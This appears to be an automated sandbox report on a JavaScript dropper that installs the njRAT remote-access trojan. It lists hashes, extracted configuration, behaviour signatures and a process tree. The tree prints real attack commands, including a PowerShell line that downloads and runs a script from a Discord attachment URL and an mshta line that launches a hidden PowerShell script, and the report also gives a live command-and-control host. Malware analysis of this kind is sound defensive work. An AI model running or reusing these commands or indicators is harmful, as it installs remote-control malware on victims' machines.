Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
10-12-2021 20:43
General
-
Target
payload.js
-
Size
254B
-
MD5
d6c1fa2786171c21d3f12b40db9973db
-
SHA1
f61d2307582855a0c214a21f7bfe78a8cfdcbc24
-
SHA256
2d5964d5c8e6b8cfc4e143160f8d1d29475218f9b86324864411d3c991bee8d5
-
SHA512
7cf20a00d0b63e7c3e9164bebca0d834376db1d8fd383647c14b6e5eefa229b5d6528ef41290c8656e78bc69f641b7060e9023f0401459562677922715325386
Malware Config
Extracted
https://cdn.discordapp.com/attachments/910897865386250264/915258994195582976/link..txt
Extracted
njrat
0.7NC
NYAN CAT
dominio12.duckdns.org:4433
9015ff612ab2
-
reg_key
9015ff612ab2
-
splitter
@!#&^%$
Signatures
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
-
Blocklisted process makes network request 1 IoCs
-
Drops startup file 1 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 33 IoCs
-
Suspicious use of WriteProcessMemory 18 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\payload.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass iex ((New-Object Net.WebClient).DownloadString('https://cdn.discordapp.com/attachments/910897865386250264/915258994195582976/link..txt'))2⤵
- Blocklisted process makes network request
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SystemLogin.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"7⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
ea6243fdb2bfcca2211884b0a21a0afc
SHA12eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA2565bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
8c0b4c510dc448a647e0e6a2e6acc7f9
SHA17c336d0ade87295139c9b388daed7929c7217c40
SHA25607d4fca35e650115c32bcf2d23788ebe08d84bd2657b893ca0a666697b01c006
SHA51284d4edbbdaba998e14094ef3de228c44b6a3fc4fc82073ab281f0ae1b451052daa0ed82b7932b838bcd9bff1986b4dc4812a074a0a8b8f3cd888ac4f1741ebec
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBSMD5
558a8b7b3fdef4ca79110f8cfd126694
SHA1d6e96ca27f701b3f4c24885dacd14c762a9d36b0
SHA25638c9b7098371b39e61a6dcf78370dddf47f4d2be2c32704a2a0310b76c52c0f7
SHA51237d6d72d5f518aaf1cf37154ed75aec7c7f11677508874eb3c3cbf44ca0ebeb22112dfa5f45a2f5d821604c521092ef768016d83f948444a9ff2e2a812d1c283
-
C:\Users\Admin\AppData\Roaming\SystemLogin.batMD5
7f85382953fde20b101039d48673dbd2
SHA15ebaa67f5862b2925d9029f4761b7e2ce9a99dd9
SHA256fde417ad1b13a97acfa8e409789a92c4c3ddf6303851337ca31b94bfac634e4f
SHA5126e93b74237844e1f78cd3ae64c0a00702c0b1aa1febda2feb52ca99b8a58ab2efd0c7b8351f040bf56a8bc1a8f5b1f57c4a9ffed46f8a2f9cba898e8e138ce46
-
C:\Users\Public\myScript.ps1MD5
6e57313d26fb045220fafc5926e4ebb5
SHA1a2ef44cf1f90521b1fae9af0ae8ac75337071618
SHA256390ab39b8c2149c593f857d51207fa6a02e3c642c40fb851583500d5bd675927
SHA51232f213b73bb6cff16973941f11e67384502c79683933a22b708d5a9b45342d0bd01383bf590913c2ca5083852c5ba8c247bfe26a3ac5d113744b34939f681802
-
memory/612-175-0x000001460AB10000-0x000001460AB12000-memory.dmpFilesize
8KB
-
memory/612-177-0x000001460AB13000-0x000001460AB15000-memory.dmpFilesize
8KB
-
memory/612-168-0x000001460AA10000-0x000001460AA12000-memory.dmpFilesize
8KB
-
memory/612-162-0x000001460AA10000-0x000001460AA12000-memory.dmpFilesize
8KB
-
memory/612-193-0x000001460AA10000-0x000001460AA12000-memory.dmpFilesize
8KB
-
memory/612-167-0x000001460AA10000-0x000001460AA12000-memory.dmpFilesize
8KB
-
memory/612-170-0x000001460AA10000-0x000001460AA12000-memory.dmpFilesize
8KB
-
memory/612-190-0x000001460AA10000-0x000001460AA12000-memory.dmpFilesize
8KB
-
memory/612-189-0x00000146257A0000-0x00000146257A3000-memory.dmpFilesize
12KB
-
memory/612-188-0x0000014625410000-0x0000014625415000-memory.dmpFilesize
20KB
-
memory/612-164-0x000001460AA10000-0x000001460AA12000-memory.dmpFilesize
8KB
-
memory/612-183-0x0000014625400000-0x0000014625402000-memory.dmpFilesize
8KB
-
memory/612-178-0x000001460AB16000-0x000001460AB18000-memory.dmpFilesize
8KB
-
memory/612-169-0x000001460AA10000-0x000001460AA12000-memory.dmpFilesize
8KB
-
memory/612-172-0x000001460AA10000-0x000001460AA12000-memory.dmpFilesize
8KB
-
memory/612-163-0x000001460AA10000-0x000001460AA12000-memory.dmpFilesize
8KB
-
memory/612-194-0x000001460AA10000-0x000001460AA12000-memory.dmpFilesize
8KB
-
memory/612-158-0x0000000000000000-mapping.dmp
-
memory/612-160-0x000001460AA10000-0x000001460AA12000-memory.dmpFilesize
8KB
-
memory/612-161-0x000001460AA10000-0x000001460AA12000-memory.dmpFilesize
8KB
-
memory/1632-151-0x0000000000000000-mapping.dmp
-
memory/2760-157-0x000001DA4D648000-0x000001DA4D650000-memory.dmpFilesize
32KB
-
memory/2760-156-0x0000000000000000-mapping.dmp
-
memory/2900-191-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/2900-192-0x000000000040676E-mapping.dmp
-
memory/2900-200-0x0000000005650000-0x0000000005B4E000-memory.dmpFilesize
5.0MB
-
memory/3884-155-0x0000000000000000-mapping.dmp
-
memory/4092-123-0x0000026B734D0000-0x0000026B734D2000-memory.dmpFilesize
8KB
-
memory/4092-116-0x0000026B734D0000-0x0000026B734D2000-memory.dmpFilesize
8KB
-
memory/4092-121-0x0000026B734D0000-0x0000026B734D2000-memory.dmpFilesize
8KB
-
memory/4092-117-0x0000026B734D0000-0x0000026B734D2000-memory.dmpFilesize
8KB
-
memory/4092-115-0x0000000000000000-mapping.dmp
-
memory/4092-119-0x0000026B734D0000-0x0000026B734D2000-memory.dmpFilesize
8KB
-
memory/4092-120-0x0000026B738F0000-0x0000026B738F1000-memory.dmpFilesize
4KB
-
memory/4092-153-0x0000026B734D0000-0x0000026B734D2000-memory.dmpFilesize
8KB
-
memory/4092-134-0x0000026B74370000-0x0000026B74372000-memory.dmpFilesize
8KB
-
memory/4092-133-0x0000026B737E6000-0x0000026B737E8000-memory.dmpFilesize
8KB
-
memory/4092-131-0x0000026B737E0000-0x0000026B737E2000-memory.dmpFilesize
8KB
-
memory/4092-132-0x0000026B737E3000-0x0000026B737E5000-memory.dmpFilesize
8KB
-
memory/4092-125-0x0000026B734D0000-0x0000026B734D2000-memory.dmpFilesize
8KB
-
memory/4092-124-0x0000026B743E0000-0x0000026B743E1000-memory.dmpFilesize
4KB
-
memory/4092-118-0x0000026B734D0000-0x0000026B734D2000-memory.dmpFilesize
8KB
-
memory/4092-122-0x0000026B734D0000-0x0000026B734D2000-memory.dmpFilesize
8KB